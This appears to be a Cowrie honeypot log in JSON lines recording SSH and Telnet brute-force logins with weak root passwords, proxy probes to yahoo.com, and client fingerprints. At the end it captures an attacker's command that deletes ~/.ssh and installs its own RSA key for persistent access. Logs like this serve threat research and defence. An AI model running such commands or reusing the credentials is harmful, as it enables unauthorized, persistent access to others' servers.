{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41054,"dst_ip":"1.2.3.4","dst_port":22,"session":"47a723c704c5","protocol":"ssh","message":"New connection: 212.227.235.229:41054 (1.2.3.4:22) [session: 47a723c704c5]","sensor":"my-vps","timestamp":"2025-08-26T07:37:33.650183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:37:33.651155Z","src_ip":"212.227.235.229","session":"47a723c704c5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T07:37:33.779419Z","src_ip":"212.227.235.229","session":"47a723c704c5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:37:34.166116Z","src_ip":"212.227.235.229","session":"47a723c704c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T07:37:34.296196Z","session":"47a723c704c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47958,"dst_ip":"1.2.3.4","dst_port":23,"session":"091510452de7","protocol":"telnet","message":"New connection: 212.227.235.229:47958 (1.2.3.4:23) [session: 091510452de7]","sensor":"my-vps","timestamp":"2025-08-26T07:37:59.132861Z"}
{"eventid":"cowrie.session.closed","duration":30.826664209365845,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:38:29.959453Z","src_ip":"212.227.235.229","session":"091510452de7"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:38:43.650394Z","src_ip":"212.227.235.229","session":"47a723c704c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57104,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6378a3aaed9","protocol":"telnet","message":"New connection: 212.227.235.229:57104 (1.2.3.4:23) [session: e6378a3aaed9]","sensor":"my-vps","timestamp":"2025-08-26T07:39:11.553248Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":11859,"dst_ip":"1.2.3.4","dst_port":22,"session":"96673bf6d753","protocol":"ssh","message":"New connection: 213.209.150.239:11859 (1.2.3.4:22) [session: 96673bf6d753]","sensor":"my-vps","timestamp":"2025-08-26T07:39:19.898535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:39:19.899343Z","src_ip":"213.209.150.239","session":"96673bf6d753"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T07:39:19.946816Z","src_ip":"213.209.150.239","session":"96673bf6d753"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:39:20.195080Z","src_ip":"213.209.150.239","session":"96673bf6d753"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24309,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24309","sensor":"my-vps","timestamp":"2025-08-26T07:39:20.244717Z","session":"96673bf6d753"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T07:39:20.292293Z","src_ip":"213.209.150.239","session":"96673bf6d753"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":1442,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1442","sensor":"my-vps","timestamp":"2025-08-26T07:39:20.429867Z","session":"96673bf6d753"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T07:39:20.477196Z","src_ip":"213.209.150.239","session":"96673bf6d753"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:39:20.525383Z","src_ip":"213.209.150.239","session":"96673bf6d753"}
{"eventid":"cowrie.session.closed","duration":31.519540548324585,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:39:43.072662Z","src_ip":"212.227.235.229","session":"e6378a3aaed9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56032,"dst_ip":"1.2.3.4","dst_port":22,"session":"31b0e546f9b6","protocol":"ssh","message":"New connection: 212.227.235.229:56032 (1.2.3.4:22) [session: 31b0e546f9b6]","sensor":"my-vps","timestamp":"2025-08-26T07:39:56.912395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:39:57.364580Z","src_ip":"212.227.235.229","session":"31b0e546f9b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:39:57.365857Z","src_ip":"212.227.235.229","session":"31b0e546f9b6"}
{"eventid":"cowrie.login.success","username":"root","password":"Layak@123","message":"login attempt [root/Layak@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:40:00.241667Z","src_ip":"212.227.235.229","session":"31b0e546f9b6"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:40:00.902615Z","src_ip":"212.227.235.229","session":"31b0e546f9b6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62040,"dst_ip":"1.2.3.4","dst_port":22,"session":"658858ca9c07","protocol":"ssh","message":"New connection: 217.72.205.35:62040 (1.2.3.4:22) [session: 658858ca9c07]","sensor":"my-vps","timestamp":"2025-08-26T07:40:02.183921Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:40:02.185566Z","src_ip":"217.72.205.35","session":"658858ca9c07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49710,"dst_ip":"1.2.3.4","dst_port":23,"session":"cccc1cd61ff5","protocol":"telnet","message":"New connection: 212.227.125.160:49710 (1.2.3.4:23) [session: cccc1cd61ff5]","sensor":"my-vps","timestamp":"2025-08-26T07:41:03.062057Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:41:03.145127Z","src_ip":"212.227.125.160","session":"cccc1cd61ff5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:41:03.202402Z","src_ip":"212.227.125.160","session":"cccc1cd61ff5"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T07:41:03.203863Z","src_ip":"212.227.125.160","session":"cccc1cd61ff5"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T07:41:03.205229Z","src_ip":"212.227.125.160","session":"cccc1cd61ff5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37720,"dst_ip":"1.2.3.4","dst_port":23,"session":"164d9d831bda","protocol":"telnet","message":"New connection: 212.227.235.229:37720 (1.2.3.4:23) [session: 164d9d831bda]","sensor":"my-vps","timestamp":"2025-08-26T07:41:04.454183Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T07:41:05.559483Z","src_ip":"212.227.235.229","session":"164d9d831bda"}
{"eventid":"cowrie.session.closed","duration":3.4280312061309814,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:41:07.882127Z","src_ip":"212.227.235.229","session":"164d9d831bda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54408,"dst_ip":"1.2.3.4","dst_port":23,"session":"864a3aad95a2","protocol":"telnet","message":"New connection: 212.227.235.229:54408 (1.2.3.4:23) [session: 864a3aad95a2]","sensor":"my-vps","timestamp":"2025-08-26T07:41:08.094429Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:41:10.172274Z","src_ip":"212.227.235.229","session":"864a3aad95a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:41:10.233788Z","src_ip":"212.227.235.229","session":"864a3aad95a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:41:12.171873Z","src_ip":"212.227.235.229","session":"864a3aad95a2"}
{"eventid":"cowrie.session.closed","duration":4.081108331680298,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:41:12.175467Z","src_ip":"212.227.235.229","session":"864a3aad95a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.1","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:44:03.261375Z","src_ip":"212.227.125.160","session":"cccc1cd61ff5"}
{"eventid":"cowrie.session.closed","duration":180.20508790016174,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:44:03.267072Z","src_ip":"212.227.125.160","session":"cccc1cd61ff5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44628,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f00420c3da4","protocol":"ssh","message":"New connection: 212.227.235.229:44628 (1.2.3.4:22) [session: 9f00420c3da4]","sensor":"my-vps","timestamp":"2025-08-26T07:45:35.006624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:45:35.560662Z","src_ip":"212.227.235.229","session":"9f00420c3da4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:45:35.562568Z","src_ip":"212.227.235.229","session":"9f00420c3da4"}
{"eventid":"cowrie.login.success","username":"root","password":"Password01","message":"login attempt [root/Password01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:45:38.242744Z","src_ip":"212.227.235.229","session":"9f00420c3da4"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:45:39.117268Z","src_ip":"212.227.235.229","session":"9f00420c3da4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50788,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d3e1d3a1455","protocol":"telnet","message":"New connection: 212.227.125.160:50788 (1.2.3.4:23) [session: 8d3e1d3a1455]","sensor":"my-vps","timestamp":"2025-08-26T07:46:03.425614Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:46:03.517197Z","src_ip":"212.227.125.160","session":"8d3e1d3a1455"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:46:03.542626Z","src_ip":"212.227.125.160","session":"8d3e1d3a1455"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T07:46:03.544287Z","src_ip":"212.227.125.160","session":"8d3e1d3a1455"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T07:46:03.545579Z","src_ip":"212.227.125.160","session":"8d3e1d3a1455"}
{"eventid":"cowrie.session.connect","src_ip":"187.103.8.215","src_port":11071,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6593d04e7be","protocol":"telnet","message":"New connection: 187.103.8.215:11071 (1.2.3.4:23) [session: a6593d04e7be]","sensor":"my-vps","timestamp":"2025-08-26T07:46:23.701711Z"}
{"eventid":"cowrie.session.closed","duration":13.0143404006958,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:46:36.715984Z","src_ip":"187.103.8.215","session":"a6593d04e7be"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54158,"dst_ip":"1.2.3.4","dst_port":22,"session":"60e97bf55197","protocol":"ssh","message":"New connection: 217.72.205.35:54158 (1.2.3.4:22) [session: 60e97bf55197]","sensor":"my-vps","timestamp":"2025-08-26T07:46:37.131893Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:46:37.133013Z","src_ip":"217.72.205.35","session":"60e97bf55197"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:03.570781Z","src_ip":"212.227.125.160","session":"8d3e1d3a1455"}
{"eventid":"cowrie.session.closed","duration":180.15256476402283,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:03.578537Z","src_ip":"212.227.125.160","session":"8d3e1d3a1455"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52148,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cd80482baab","protocol":"ssh","message":"New connection: 212.227.235.229:52148 (1.2.3.4:22) [session: 0cd80482baab]","sensor":"my-vps","timestamp":"2025-08-26T07:49:26.729532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:49:26.730480Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:49:27.036574Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123#","message":"login attempt [root/Qwerty123#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:49:28.303081Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:49:28.966740Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:49:28.967852Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:49:28.969095Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:29.276946Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:49:29.906183Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:49:29.906937Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
